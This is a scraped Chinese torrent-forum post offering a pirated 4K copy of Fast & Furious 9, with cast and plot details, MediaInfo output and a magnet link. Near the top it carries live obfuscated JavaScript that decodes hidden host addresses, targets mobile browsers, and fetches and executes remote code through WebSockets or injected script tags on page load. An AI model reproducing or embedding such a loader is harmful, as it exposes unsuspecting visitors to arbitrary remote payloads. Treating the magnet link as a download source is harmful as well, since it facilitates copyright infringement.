速度与激情9[国语中字].Fast.and.Furious.9.The.Fast.Saga.2021.2160p.WEB-DL.60FPS.H265.Bit10.DDP5.1.2Audio 6.67GB

版主小s 1月前 356

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 速度与激情9 / F9狂野时速(港) / 玩命关头9(台) / 狂野时速9 / 速激9 / FF9 / Fast & Furious 9
◎片  名 F9: The Fast Saga
◎年  代 2021
◎产  地 美国 / 泰国 / 加拿大
◎类  别 动作 / 犯罪
◎语  言 英语
◎上映日期 2021-05-21(中国大陆) / 2021-05-19(韩国) / 2021-06-25(美国)
◎IMDb链接 https://www.imdb.com/title/tt5433138/
◎豆瓣评分 5.3/10 (146538人评价)
◎豆瓣链接 https://movie.douban.com/subject/25728006/
◎片  长 142分钟(中国大陆)
◎导  演 林诣彬 Justin Lin (id:1290066)
◎编  剧 丹·凯西 Daniel Casey (id:1071251)
       盖瑞·斯科特·汤普森 Gary Scott Thompson (id:1028134)
       克里斯·摩根 Chris Morgan (id:1347624)
◎演  员 范·迪塞尔 Vin Diesel (id:1041020)
       约翰·塞纳 John Cena (id:1044883)
       米歇尔·罗德里格兹 Michelle Rodriguez (id:1025174)
       乔丹娜·布鲁斯特 Jordana Brewster (id:1000036)
       泰瑞斯·吉布森 Tyrese Gibson (id:1010486)
       卢达·克里斯 Ludacris (id:1049714)
       查理兹·塞隆 Charlize Theron (id:1018991)
       海伦·米伦 Helen Mirren (id:1054390)
       姜成镐 Sung Kang (id:1000166)
       娜塔莉·伊曼纽尔 Nathalie Emmanuel (id:1328248)
       迈克尔·鲁克 Michael Rooker (id:1002751)
       卢卡斯·布莱克 Lucas Black (id:1036315)
       杜俊纬 Jason Tobin (id:1414084)
       卡迪·B Cardi B (id:1404564)
       吉姆·帕拉克 Jim Parrack (id:1315255)
       芬恩·科尔 Finn Cole (id:1344701)
       安珀·西耶娜 Amber Sienna (id:1434120)
       马丁·福特 Martyn Ford (id:1371909)
       艾拉·沃克 Ella Walker (id:1446998)
       泽井杏奈 Anna Sawai (id:1270490)
       图厄·埃尔斯特德·拉斯姆森 Thue Ersted Rasmussen (id:1432965)
       米拉吉·格尔比克 Miraj Grbic (id:1181259)
       吉米·斯达 Jimmy Star (id:1273873)
       莱克斯·艾尔 Lex Elle (id:1419250)
       温尼·贝内特 Vinnie Bennett (id:1419615)
       马克·克雷尼克 Mark Krenik (id:1428358)
       杰森·斯坦森 Jason Statham (id:1049484)
       尼尔·H·莫瑞兹 Neal H. Moritz (id:1019194)
       布莱恩·泰勒 Brian Tyler (id:1276412)
       斯蒂芬·F·温顿 Stephen F. Windon (id:1301075)

◎标  签 动作 / 美国 / 飙车 / 犯罪 / 2021 / 跑车 / 赛车 / 科幻

◎简  介
  “唐老大”多姆·托莱多(范·迪塞尔 饰)与莱蒂(米歇尔·罗德里格兹 饰)和他的儿子小布莱恩,过上了远离纷扰的平静生活。然而他们也知道,安宁之下总潜藏着危机。这一次,为了保护他所爱的人,唐老大不得不直面过去。他和伙伴们面临的是一场足以引起世界动荡的阴谋,以及一个前所未遇的一流杀手和高能车手。而这个名叫雅各布(约翰·塞纳 饰)的人,恰巧是多姆遗落在外的亲弟弟。

◎获奖情况 (共2项)
  第7届豆瓣电影年度榜单 (2020)
  最值得期待的外语电影(提名)

  第6届豆瓣电影年度榜单 (2019)
  最值得期待的外语电影(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 244910127454092215080791028649545882351 (0xB83FF98D75AC14268F10A71AF2F6DAEF)

  4. Complete name                            : 速度与激情9.Fast.and.Furious.9.The.F[email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 6.67 GiB

  8. Duration                                 : 2 h 22 min

  9. Overall bit rate                         : 6 722 kb/s

  10. Encoded date                             : UTC 2021-08-17 16:39:48

  11. Writing application                      : mkvmerge v50.0.0 ('Awakenings') 64-bit

  12. Writing library                          : libebml v1.4.0 + libmatroska v1.6.2


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@Main

  18. Codec ID                                 : V_MPEGH/ISO/HEVC

  19. Duration                                 : 2 h 22 min

  20. Bit rate                                 : 6 206 kb/s

  21. Width                                    : 3 840 pixels

  22. Height                                   : 1 608 pixels

  23. Display aspect ratio                     : 2.40:1

  24. Frame rate mode                          : Constant

  25. Frame rate                               : 60.000 FPS

  26. Color space                              : YUV

  27. Chroma subsampling                       : 4:2:0

  28. Bit depth                                : 10 bits

  29. Bits/(Pixel*Frame)                       : 0.017

  30. Stream size                              : 6.16 GiB (92%)

  31. Language                                 : English

  32. Default                                  : Yes

  33. Forced                                   : No

  34. Color range                              : Limited

  35. Color primaries                          : BT.709

  36. Transfer characteristics                 : BT.709

  37. Matrix coefficients                      : BT.709


  38. Audio #1

  39. ID                                       : 2

  40. Format                                   : E-AC-3

  41. Format/Info                              : Enhanced AC-3

  42. Commercial name                          : Dolby Digital Plus

  43. Codec ID                                 : A_EAC3

  44. Duration                                 : 2 h 22 min

  45. Bit rate mode                            : Constant

  46. Bit rate                                 : 256 kb/s

  47. Channel(s)                               : 6 channels

  48. Channel layout                           : L R C LFE Ls Rs

  49. Sampling rate                            : 48.0 kHz

  50. Frame rate                               : 31.250 FPS (1536 SPF)

  51. Compression mode                         : Lossy

  52. Stream size                              : 260 MiB (4%)

  53. Title                                    : English

  54. Language                                 : English

  55. Service kind                             : Complete Main

  56. Default                                  : Yes

  57. Forced                                   : No


  58. Audio #2

  59. ID                                       : 3

  60. Format                                   : E-AC-3

  61. Format/Info                              : Enhanced AC-3

  62. Commercial name                          : Dolby Digital Plus

  63. Codec ID                                 : A_EAC3

  64. Duration                                 : 2 h 22 min

  65. Bit rate mode                            : Constant

  66. Bit rate                                 : 256 kb/s

  67. Channel(s)                               : 6 channels

  68. Channel layout                           : L R C LFE Ls Rs

  69. Sampling rate                            : 48.0 kHz

  70. Frame rate                               : 31.250 FPS (1536 SPF)

  71. Compression mode                         : Lossy

  72. Stream size                              : 260 MiB (4%)

  73. Title                                    : Chinese

  74. Language                                 : Chinese

  75. Service kind                             : Complete Main

  76. Default                                  : No

  77. Forced                                   : No




TAGS 动作 犯罪

磁力链:
  • magnet:?xt=urn:btih:A9977062E0851D632FC44A47C9A9C562E13FBED0
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回